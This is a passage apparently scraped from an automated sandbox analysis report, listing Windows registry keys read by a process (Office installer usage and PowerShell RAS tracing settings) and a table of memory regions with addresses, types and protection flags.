HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 182 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
294000
|
heap
|
page read and write
|
|
|
|
7FE8B7B4000
|
trusted library allocation
|
page read and write
|
||
|
1C27E000
|
heap
|
page read and write
|
||
|
1AA9C000
|
heap
|
page read and write
|
||
|
1C990000
|
heap
|
page read and write
|
||
|
7FE8B610000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B6E0000
|
trusted library allocation
|
page read and write
|
||
|
1C359000
|
heap
|
page read and write
|
||
|
1C2FE000
|
heap
|
page read and write
|
||
|
1AADD000
|
heap
|
page read and write
|
||
|
1C70000
|
heap
|
page read and write
|
||
|
7FFFFF20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C232000
|
heap
|
page read and write
|
||
|
208000
|
heap
|
page read and write
|
||
|
456000
|
heap
|
page read and write
|
||
|
12371000
|
trusted library allocation
|
page read and write
|
||
|
1AF36000
|
heap
|
page read and write
|
||
|
7FE8B860000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B620000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B6D0000
|
trusted library allocation
|
page read and write
|
||
|
23E000
|
heap
|
page read and write
|
||
|
7FE8B4D0000
|
trusted library allocation
|
page read and write
|
||
|
124FF000
|
trusted library allocation
|
page read and write
|
||
|
1AC000
|
stack
|
page read and write
|
||
|
2E5F000
|
trusted library allocation
|
page read and write
|
||
|
1C78C000
|
stack
|
page read and write
|
||
|
2ACE000
|
trusted library allocation
|
page read and write
|
||
|
336000
|
heap
|
page read and write
|
||
|
1237F000
|
trusted library allocation
|
page read and write
|
||
|
420000
|
heap
|
page read and write
|
||
|
7FE8B7B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B700000
|
trusted library allocation
|
page read and write
|
||
|
200000
|
heap
|
page read and write
|
||
|
7FE8B7C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2FF000
|
heap
|
page read and write
|
||
|
7FE8B6B0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5DC000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B424000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B440000
|
trusted library allocation
|
page read and write
|
||
|
1B5AF000
|
stack
|
page read and write
|
||
|
23CE000
|
trusted library allocation
|
page read and write
|
||
|
348000
|
heap
|
page read and write
|
||
|
A3000
|
stack
|
page read and write
|
||
|
7FE8B660000
|
trusted library allocation
|
page read and write
|
||
|
1A66F000
|
stack
|
page read and write
|
||
|
7FE8B6F0000
|
trusted library allocation
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
1AA50000
|
heap
|
page read and write
|
||
|
20C0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5C0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7B9000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B715000
|
trusted library allocation
|
page read and write
|
||
|
29B000
|
heap
|
page read and write
|
||
|
7FE8B4D6000
|
trusted library allocation
|
page read and write
|
||
|
1AB19000
|
heap
|
page read and write
|
||
|
7FE8B640000
|
trusted library allocation
|
page read and write
|
||
|
2B6F000
|
trusted library allocation
|
page read and write
|
||
|
2AFF000
|
trusted library allocation
|
page read and write
|
||
|
1B26F000
|
stack
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
320000
|
heap
|
page read and write
|
||
|
1A370000
|
heap
|
page read and write
|
||
|
1C206000
|
heap
|
page read and write
|
||
|
1B224000
|
heap
|
page read and write
|
||
|
7FE8B630000
|
trusted library allocation
|
page read and write
|
||
|
1B70000
|
heap
|
page read and write
|
||
|
1C5EE000
|
stack
|
page read and write
|
||
|
1A92E000
|
heap
|
page execute and read and write
|
||
|
7FE8B7D8000
|
trusted library allocation
|
page read and write
|
||
|
1C1BB000
|
heap
|
page read and write
|
||
|
7FFFFF10000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AB1C000
|
heap
|
page read and write
|
||
|
2010000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE8B770000
|
trusted library allocation
|
page read and write
|
||
|
1C83F000
|
stack
|
page read and write
|
||
|
7FE8B7CA000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
12506000
|
trusted library allocation
|
page read and write
|
||
|
35E000
|
heap
|
page read and write
|
||
|
1C180000
|
heap
|
page read and write
|
||
|
290000
|
heap
|
page read and write
|
||
|
1BA6000
|
heap
|
page read and write
|
||
|
1A740000
|
heap
|
page read and write
|
||
|
7FE8B624000
|
trusted library allocation
|
page read and write
|
||
|
12381000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B628000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A72F000
|
stack
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
1AEFF000
|
stack
|
page read and write
|
||
|
1B220000
|
heap
|
page read and write
|
||
|
7FE8B650000
|
trusted library allocation
|
page read and write
|
||
|
12508000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B540000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B38E000
|
stack
|
page read and write
|
||
|
1C300000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
2188000
|
stack
|
page read and write
|
||
|
7FE8B780000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B506000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AA49000
|
stack
|
page read and write
|
||
|
1C185000
|
heap
|
page read and write
|
||
|
1AF00000
|
heap
|
page read and write
|
||
|
7FE8B4DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B5AE000
|
stack
|
page read and write | page guard
|
||
|
7FE8B602000
|
trusted library allocation
|
page read and write
|
||
|
123A1000
|
trusted library allocation
|
page read and write
|
||
|
21F0000
|
heap
|
page execute and read and write
|
||
|
236F000
|
stack
|
page read and write
|
||
|
29D000
|
heap
|
page read and write
|
||
|
270000
|
heap
|
page read and write
|
||
|
7FE8B680000
|
trusted library allocation
|
page read and write
|
||
|
1A839000
|
stack
|
page read and write
|
||
|
124EF000
|
trusted library allocation
|
page read and write
|
||
|
1B43C000
|
stack
|
page read and write
|
||
|
12504000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B793000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B42D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE8B760000
|
trusted library allocation
|
page read and write
|
||
|
1C2A3000
|
heap
|
page read and write
|
||
|
1C2C8000
|
heap
|
page read and write
|
||
|
1C2F4000
|
heap
|
page read and write
|
||
|
430000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B710000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B670000
|
trusted library allocation
|
page read and write
|
||
|
328000
|
heap
|
page read and write
|
||
|
7FE8B433000
|
trusted library allocation
|
page read and write
|
||
|
1C299000
|
heap
|
page read and write
|
||
|
1B0BE000
|
stack
|
page read and write
|
||
|
7FE8B730000
|
trusted library allocation
|
page read and write
|
||
|
2711000
|
trusted library allocation
|
page read and write
|
||
|
1C35F000
|
heap
|
page read and write
|
||
|
1C30B000
|
heap
|
page read and write
|
||
|
7FE8B4E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C241000
|
heap
|
page read and write
|
||
|
7FE8B7D0000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B740000
|
trusted library allocation
|
page read and write
|
||
|
1C74000
|
heap
|
page read and write
|
||
|
2C2A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B47C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B30E000
|
stack
|
page read and write
|
||
|
7FE8B690000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B720000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B5E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C287000
|
heap
|
page read and write
|
||
|
7FE8B790000
|
trusted library allocation
|
page read and write
|
||
|
36E2000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B7CE000
|
trusted library allocation
|
page read and write
|
||
|
1C6DD000
|
stack
|
page read and write
|
||
|
7FE8B6C0000
|
trusted library allocation
|
page read and write
|
||
|
1AA52000
|
heap
|
page read and write
|
||
|
20E000
|
heap
|
page read and write
|
||
|
1A5DA000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
7FE8B5D7000
|
trusted library allocation
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
1C9A3000
|
heap
|
page read and write
|
||
|
2EC2000
|
trusted library allocation
|
page read and write
|
||
|
1A8B9000
|
stack
|
page read and write
|
||
|
7FE8B5D3000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B43B000
|
trusted library allocation
|
page read and write
|
||
|
272000
|
heap
|
page read and write
|
||
|
7FE8B430000
|
trusted library allocation
|
page read and write
|
||
|
2572000
|
trusted library allocation
|
page read and write
|
||
|
1C200000
|
heap
|
page read and write
|
||
|
372000
|
heap
|
page read and write
|
||
|
2090000
|
trusted library allocation
|
page read and write
|
||
|
1A8F0000
|
heap
|
page execute and read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
27DE000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B423000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A8F8000
|
heap
|
page execute and read and write
|
||
|
7FE8B422000
|
trusted library allocation
|
page read and write
|
||
|
2A9A000
|
trusted library allocation
|
page read and write
|
||
|
1B130000
|
heap
|
page read and write
|
||
|
7FE8B6A0000
|
trusted library allocation
|
page read and write
|
||
|
1C13F000
|
stack
|
page read and write
|
||
|
7FE8B76F000
|
trusted library allocation
|
page read and write
|
||
|
2371000
|
trusted library allocation
|
page read and write
|
||
|
1AAA7000
|
heap
|
page read and write
|
||
|
444000
|
heap
|
page read and write
|
||
|
7FE8B7C6000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B750000
|
trusted library allocation
|
page read and write
|
||
|
3736000
|
trusted library allocation
|
page read and write
|
There are 177 hidden memdumps, click here to show them.